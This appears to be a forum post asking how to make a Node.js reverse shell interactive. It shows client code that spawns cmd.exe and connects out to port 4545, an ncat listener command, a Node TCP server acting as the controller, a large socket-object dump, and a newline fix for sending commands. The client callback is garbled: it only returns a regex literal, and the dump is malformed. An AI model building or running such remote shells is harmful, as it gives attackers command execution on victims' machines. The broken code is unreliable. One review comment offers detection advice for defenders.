Good morning everyone, I am having an issue with a reverse shell in Node.js. When I create a socket and listen with netcat it works perfectly, but when I create a new server with net.Server I receive the header of the shell but it is not interactive. The shell code is like this:
// Fragment as posted: the rest of the connect callback and its closing `});` are not shown.
// Loads the core TCP module (net) and the process-spawning module (child_process).
var net = require("net"),
child = require("child_process"),
// Starts cmd.exe as a child process, with no arguments, as soon as this statement runs.
shell = child.spawn("cmd.exe", []);
// Client socket used for the outbound connection below.
var client = new net.Socket();
// Connects out to TCP port 4545; the host string is empty as posted (possibly redacted, confirm).
// NOTE(review): for defenders, the pattern visible here is a node process that owns a cmd.exe
// child and an outbound TCP connection; process-creation and network telemetry can be
// correlated on that parent/child pair and destination port.
client.connect(4545, "", function(){
// The only statement visible inside the callback: it returns a regex literal.
return /a/;
When I listen with netcat, I get the reverse shell:
ncat -nvlp 4545
But the problem arises when I want to create a TCP server in Node.js: I receive the banner of cmd.exe, but without interactivity.
This is the code of the server part:
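const net = require("net");

// TCP listener on port 4545 that logs server and connection lifecycle events.
// The closing `});` lines missing from the posted snippet are restored here.
// The host is an empty string as posted (possibly redacted).
// NOTE(review): Node treats an empty host like an omitted one and binds the
// unspecified address, so the port is reachable on every interface; pass an
// explicit interface address if the listener should be reachable from one network only.
const server = new net.Server();

server.listen({ host: '', port: 4545 }, () => {
  console.log(`Server listen in 4545`);
});

// Emitted when the server itself stops listening (not when one client leaves).
server.on("close", () => {
  console.log('connection closed')
});

server.on("error", (e) => {
  if (e.code === "EADDRINUSE") {
    console.log("Address in use, retrying...");
    setTimeout(() => {
      // Fix: the original called `this.server.listen(...)`. Inside an arrow
      // function at module scope `this` is not the server, so `this.server`
      // was undefined and the retry threw instead of listening again.
      server.listen(4545, '');
    }, 2000);
  } else {
    // Other listener errors were silently dropped; surface them in the log.
    console.error(e);
  }
});

server.on("connection", (socket) => {
  console.log("new connection");

  // Capture the peer once: interpolating the socket object itself into a
  // template string only yields "[object Object]", which is useless in a log.
  const peer = `${socket.remoteAddress}:${socket.remotePort}`;

  // Socket is quitted
  socket.on("close", () => {
    console.log('socket closed')
  });

  // The remote side finished sending (FIN received).
  socket.on("end", () => {
    console.log(`Client ${peer} disconnected`);
  });
});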
When I send a command, for example 'dir', I receive an object with the pipe, which is located above in the server. So the question is: how can I receive the result of a command when I send it, for example receiving the file and directory listing over the socket?
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
writable: true,
allowHalfOpen: false,
_sockname: { address: '', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:',
[Symbol(asyncId)]: 16
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:',
[Symbol(asyncId)]: 16
id: 790,
_peername: { address: '', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
After several attempts, I managed to get it working by adding \n to the write call so that the command is entered; the code becomes:
// Writes the command text followed by '\n' so the peer receives a complete, terminated line.
// `socket` is defined outside this fragment (presumably the connection handler's argument; confirm).
socket.write('command'+ '\n');